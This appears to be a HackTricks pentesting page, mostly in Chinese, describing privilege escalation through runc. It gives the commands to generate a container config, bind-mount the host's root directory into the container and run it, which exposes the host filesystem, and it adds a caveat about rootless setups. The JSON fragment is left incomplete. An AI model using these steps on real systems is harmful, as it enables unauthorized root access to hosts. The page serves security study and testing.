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RunC 权限提升
从零开始学习 AWS 黑客技术,成为 htARTE (HackTricks AWS 红队专家)!
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如果您想了解更多关于 runc 的信息,请查看以下页面:
{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %} 2375-pentesting-docker.md {% endcontent-ref %}
如果您发现宿主机中安装了 runc
,您可能能够运行一个容器,挂载宿主机的根 / 目录。
runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder
Inside the "mounts" section of the create config.json add the following lines:
"type": "bind",
"source": "/",
"destination": "/",
"options": [
#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs
# Finally, start the container
# The root folder is the one from the host
runc run demo
{% hint style="danger" %} 这并不总是有效的,因为runc的默认操作是以root身份运行,所以以非特权用户身份运行它根本无法工作(除非你有一个rootless配置)。将rootless配置设置为默认并不是一个好主意,因为在rootless容器内部有很多限制在rootless容器外部不适用。 {% endhint %}
从零开始学习AWS黑客攻击直到成为专家,通过 htARTE (HackTricks AWS Red Team Expert)!
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